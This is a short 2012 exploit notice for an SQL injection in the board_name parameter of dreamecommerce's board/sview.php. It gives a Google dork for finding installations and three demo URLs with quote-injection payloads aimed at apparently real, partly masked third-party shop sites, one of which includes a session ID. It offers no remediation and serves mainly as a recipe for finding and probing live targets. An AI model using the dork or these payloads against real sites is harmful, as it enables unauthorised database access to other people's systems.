# Exploit Title: dreamecommerce sql injection Vulnerability
#
# Google Dork: inurl:board/sview.php?board_name=
#
# Date: 09/28/2012
#
# Author: Crim3R
#
# download Link Or Vendor Home: http://dreamecommerce.net/
#
# Tested on: all
#
==================================
board_name parametr is injectable
D3M0 :
www.doubljXXXlesale.com/board/sview.php?board_name=SDREAMBOARD1'''&choose2=&choose1=&pagenow=6&CB=&ID=12&PHPSESSID=69a947d939f55fe7b9cdf60c15dd2efa
http://doXXju.com/board/sview.php?board_name=SDREAMBOARD1'''&CB=&choose1=SU|CT|NM&choose2=1&ID=11&pagenow=1
http://froXXXitch.com/board/sview.php?board_name=SDREAMBOARD3%27%27%27%27&choose2=&choose1=&pagenow=1&CB=&ID=8
===============Crim3R@Att.Net=========